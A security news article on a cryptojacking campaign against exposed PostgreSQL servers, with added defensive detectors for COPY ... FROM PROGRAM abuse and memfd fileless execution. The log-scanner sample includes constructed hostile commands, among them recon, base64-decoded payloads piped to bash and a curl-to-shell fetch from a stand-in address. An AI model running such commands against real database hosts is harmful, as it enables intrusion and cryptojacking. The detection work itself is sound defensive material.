A new cybercrime campaign is targeting internet-exposed PostgreSQL databases to install cryptocurrency miners and has compromised more than 1,500 systems. Researchers from cloud security firm Wiz attribute the activity to a threat actor they track as JINX-0126, which uses evasion techniques such as a binary with a unique hash for every target and fileless execution of the miner payload. The campaign relies on weak or predictable credentials on publicly reachable PostgreSQL services; once authenticated, the attackers run reconnaissance and deploy their tooling. The distinctive element is the abuse of the SQL command COPY … FROM PROGRAM, a built-in feature that lets a sufficiently privileged database role run arbitrary shell commands on the database host. Organizations should lock down exposure and privileges on their PostgreSQL instances to mitigate this risk.
Exposed PostgreSQL Instances Targeted by New Cryptocurrency Mining Campaign
April 01, 2025
By Ravie Lakshmanan
Tags: Cryptojacking, Cloud Security
A new threat targeting exposed PostgreSQL database instances is making waves in cybersecurity. The campaign, discovered by cloud security firm Wiz, aims to gain unauthorized access to these databases and use them to deploy cryptocurrency miners. Wiz describes the activity as a variant of an intrusion set first flagged by Aqua Security in August 2024, which involved a malware strain dubbed PG_MEM, and attributes it to a threat actor the company calls JINX-0126.
Advanced Techniques Used by Cybercriminals
According to Wiz researchers, the attackers have refined their tactics to evade detection. By deploying a binary with a unique hash for each target and executing the miner payload filelessly, they sidestep cloud workload protection solutions that rely only on file-hash reputation. The research team estimates that the activity has already affected more than 1,500 victims, and that initial access came from weak or predictable credentials on publicly exposed PostgreSQL instances rather than from any software vulnerability.
Unique Command Exploitation
One of the most troubling aspects of this campaign is the misuse of the SQL command “COPY … FROM PROGRAM.” This is a documented, legitimate PostgreSQL feature: it pipes the output of a shell command into a table (and COPY … TO PROGRAM pipes table data into a command’s standard input). The command runs under the operating-system account that hosts the database server, typically the `postgres` user, so it does not by itself grant root, but it does hand an authenticated database client a shell on the host. PostgreSQL restricts the command to superusers and members of the `pg_execute_server_program` role, which is why a guessable superuser password on an internet-facing instance is enough for the attackers to get code execution.
After authenticating to a weakly configured instance, the attackers use this capability to perform reconnaissance on the host and then load a Base64-encoded payload. The payload is a shell script that kills competing cryptocurrency miners and installs a binary known as PG_CORE.
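The abuse described above leaves a trace if statement logging is on (`log_statement = 'all'`, or at least `'ddl'` plus auditing of COPY), because the full COPY text, including the shell command, is written to the PostgreSQL log. The following detector, added here as an illustrative example and not code from Wiz or the PostgreSQL project, parses a constructed sample of such a log, pulls out every COPY … FROM/TO PROGRAM statement, and tags the ones that look like the reconnaissance and Base64-decode-and-pipe pattern discussed in the article. The log lines, host names and addresses are made up for the example; the `log_line_prefix` assumed is PostgreSQL’s default `%m [%p] ` with a user@db field added.

```python
"""Flag COPY ... FROM/TO PROGRAM statements in a PostgreSQL log.

Added example (not from the original article). Assumes log_statement = 'all'
and a log_line_prefix of '%m [%p] %u@%d ' so each statement line looks like:
  2025-04-01 10:15:07.513 UTC [2230] postgres@postgres LOG:  statement: COPY ...
"""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample log; none of these lines are real attacker artifacts.
SAMPLE_LOG = """\
2025-04-01 10:15:02.101 UTC [2211] app@shop LOG:  statement: SELECT id, name FROM products WHERE id = 42
2025-04-01 10:15:04.220 UTC [2214] postgres@postgres LOG:  statement: COPY staging FROM '/var/lib/postgresql/import.csv' WITH (FORMAT csv)
2025-04-01 10:15:07.513 UTC [2230] postgres@postgres LOG:  statement: COPY recon FROM PROGRAM 'uname -a; id; cat /etc/os-release'
2025-04-01 10:15:09.004 UTC [2230] postgres@postgres LOG:  statement: copy x from program 'echo aWQ= | base64 -d | bash'
2025-04-01 10:15:11.777 UTC [2230] postgres@postgres LOG:  statement: COPY (SELECT 1) TO PROGRAM 'curl -s http://203.0.113.5/x | sh'
2025-04-01 10:15:12.000 UTC [2231] app@shop LOG:  statement: SELECT * FROM orders WHERE note = 'copy from program'
"""

# One logged statement: timestamp, backend pid, user@db, then the SQL text.
STATEMENT_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@ ]+)@(?P<db>\S+) LOG:\s+"
    r"(?:statement|execute [^:]+):\s*(?P<sql>.*)$"
)

# The statement itself must *start* with COPY; the final SELECT in the sample,
# which merely contains the words inside a string literal, must not match.
COPY_PROGRAM_RE = re.compile(
    r"^\s*COPY\b.*?\b(?P<dir>FROM|TO)\s+PROGRAM\s+(?P<q>'(?:[^']|'')*')",
    re.IGNORECASE | re.DOTALL,
)

# Heuristics applied to the shell command handed to the server's OS user.
INDICATORS = [
    ("base64-decoded payload", re.compile(r"base64\s+(?:-d\b|--decode)")),
    ("piped to a shell", re.compile(r"\|\s*(?:ba|z|da)?sh\b")),
    ("downloader", re.compile(r"\b(?:curl|wget)\b")),
]


@dataclass
class Finding:
    ts: str
    pid: int
    user: str
    direction: str        # FROM: command stdout lands in a table; TO: table feeds stdin
    command: str          # the shell command run on the database host
    indicators: List[str]


def unquote(lit: str) -> str:
    """Strip the SQL quotes and undo the '' escape for an embedded quote."""
    return lit[1:-1].replace("''", "'")


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per COPY ... FROM/TO PROGRAM statement in the log."""
    findings = []
    for line in text.splitlines():
        m = STATEMENT_RE.match(line)
        if not m:
            continue
        c = COPY_PROGRAM_RE.match(m["sql"])
        if not c:
            continue
        cmd = unquote(c["q"])
        direction = c["dir"].upper()
        indicators = ["COPY ... %s PROGRAM" % direction]
        indicators += [label for label, pat in INDICATORS if pat.search(cmd)]
        findings.append(Finding(m["ts"], int(m["pid"]), m["user"], direction, cmd, indicators))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} pid={f.pid} user={f.user} {f.direction} PROGRAM: {f.command!r}")
        print("   indicators:", ", ".join(f.indicators))
```

Any hit from a role that should never hold `pg_execute_server_program` is worth an immediate look; the plain CSV import on the second line is correctly ignored because it reads a file, not a program. The regex deliberately anchors on the start of the statement so that the words “copy from program” inside a string literal do not produce a false positive.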
Persisting Through Obfuscation
The attackers also deploy an obfuscated Golang binary named postmaster, which borrows the name of the genuine PostgreSQL supervisor process so that it blends into a process listing. It establishes persistence on the compromised host through a cron job, creates a new database role with elevated privileges, and drops another binary called cpu_hu.
The cpu_hu binary downloads the latest XMRig miner release from GitHub and launches it with a fileless technique based on Linux memfd: the miner is written into an anonymous, memory-backed file created with memfd_create and executed from there, so no conventional miner binary ever lands on disk for file-based scanners to inspect.
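Fileless execution of this kind is not invisible, because the kernel still reports where a running process’s image came from. For a memfd-launched program, `readlink /proc/<pid>/exe` returns `/memfd:<name> (deleted)` and the executable mappings in `/proc/<pid>/maps` carry the same pseudo-path, which exists nowhere on disk. The detector below is an added example written for this article, not code from Wiz or from the campaign; it checks both artefacts against a constructed sample (the memfd name `miner` and the addresses are illustrative) and can also walk a live `/proc` on Linux.

```python
"""Detect processes executing from an anonymous memfd (fileless execution).

Added example, not from the original article. On Linux, memfd_create() yields
a RAM-backed file; a process started from it (fexecve() or exec of
/proc/self/fd/N) shows up as '/memfd:<name> (deleted)' in /proc/<pid>/exe and
in the executable mappings of /proc/<pid>/maps.
"""
import os
import re
from typing import Dict, List, Optional

MEMFD_RE = re.compile(r"^/memfd:(?P<name>.*?)(?: \(deleted\))?$")

# Constructed sample: what readlink(/proc/<pid>/exe) returns for a normal
# PostgreSQL backend versus a process launched from a memfd (illustrative only).
SAMPLE_EXE = {
    1042: "/usr/lib/postgresql/16/bin/postgres",
    2230: "/memfd:miner (deleted)",
}

# Constructed /proc/<pid>/maps excerpt for the memfd-backed process.
SAMPLE_MAPS = """\
5583b2c00000-5583b2e3f000 r-xp 00000000 00:01 8821       /memfd:miner (deleted)
5583b2e3f000-5583b2e48000 rw-p 0023f000 00:01 8821       /memfd:miner (deleted)
7f1c8a000000-7f1c8a1c3000 r-xp 00000000 08:01 131585     /usr/lib/x86_64-linux-gnu/libc.so.6
"""


def classify_exe(exe_target: str) -> Optional[str]:
    """Return the memfd name if the exe link points at an anonymous memory
    file, or None for an ordinary on-disk executable."""
    m = MEMFD_RE.match(exe_target)
    return m["name"] if m else None


def flag_processes(exe_map: Dict[int, str]) -> Dict[int, str]:
    """{pid: memfd name} for every entry whose exe is memfd-backed."""
    return {pid: name for pid, target in exe_map.items()
            if (name := classify_exe(target)) is not None}


def suspicious_maps(maps_text: str) -> List[str]:
    """Executable (x) mappings backed by a memfd in a /proc/<pid>/maps dump."""
    hits = []
    for line in maps_text.splitlines():
        # address perms offset dev inode pathname (pathname may contain spaces)
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        perms, path = parts[1], parts[5]
        if "x" in perms and path.startswith("/memfd:"):
            hits.append(path)
    return hits


def read_proc_exe_links(proc_root: str = "/proc") -> Dict[int, str]:
    """Live collection of exe link targets; empty off Linux or without /proc.
    Reading another user's exe link needs the same uid or CAP_SYS_PTRACE."""
    links: Dict[int, str] = {}
    if not os.path.isdir(proc_root):
        return links
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            links[int(entry)] = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:  # kernel thread, exited process, or no permission
            continue
    return links


def scan_proc(proc_root: str = "/proc") -> Dict[int, str]:
    """Live scan: memfd-backed processes visible to the caller."""
    return flag_processes(read_proc_exe_links(proc_root))


if __name__ == "__main__":
    print("sample:", flag_processes(SAMPLE_EXE))
    print("sample maps:", suspicious_maps(SAMPLE_MAPS))
    print("live:", scan_proc())
```

The one-liner equivalent on a host is `ls -l /proc/*/exe 2>/dev/null | grep memfd`. Because the miner binary never touches disk, a file-hash blocklist will not catch it; the process-image check above, together with CPU usage and outbound connections to mining pools, is the practical signal.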
The campaign shows the effort cybercriminals now put into compromising systems to mine cryptocurrency at scale. Because each victim is assigned its own mining worker, Wiz was able to count the workers and estimate that the operation spans more than 1,500 compromised machines.
Stay Informed and Secure
In the ever-evolving landscape of cyber threats, it’s critical for organizations to monitor their PostgreSQL configurations and employ robust security measures. Following cybersecurity updates can help ensure systems remain secure against potential attacks like the one from JINX-0126.
For more insights into cybersecurity and to stay updated on similar threats, consider following reliable sources in the industry.
What happened with the PostgreSQL servers?
Over 1,500 PostgreSQL servers were hacked in a recent campaign to mine cryptocurrency. Attackers used a method that does not leave traditional files on the servers, making it harder to detect.
How do hackers compromise these servers?
In this campaign the attackers simply logged in with weak or predictable passwords on PostgreSQL instances reachable from the internet; unpatched software is the other common entry point in general. Once authenticated with a privileged database role, they can run commands on the host and install mining software without alerting the owner.
What is fileless cryptocurrency mining?
Fileless cryptocurrency mining is when the mining software runs from memory only, without a conventional miner binary on disk. In this campaign that is done with Linux memfd, which executes the miner from an anonymous memory-backed file. Traditional antivirus tools that scan files or match file hashes therefore have nothing to inspect, so detection has to look at running processes instead.
How can I protect my PostgreSQL server?
Do not expose PostgreSQL (port 5432 by default) to the internet; bind it to private interfaces and restrict client addresses in pg_hba.conf and at the firewall. Use strong, unique passwords for the superuser and every other role, and grant superuser or `pg_execute_server_program` only to roles that genuinely need to run server-side programs. Keep the software updated, enable statement and connection logging, and review the logs regularly for unexpected COPY … FROM PROGRAM statements, new roles, or logins from unfamiliar addresses.
What should I do if my server has been compromised?
If you suspect a compromise, isolate the server from the network to stop further damage, then investigate before rebuilding. Rotate every database credential, including the superuser password, and check for the persistence mechanisms this campaign uses: unknown cron jobs, newly created database roles with elevated privileges, and processes running from memory rather than from a file on disk. Consulting security professionals for the forensic work is advisable.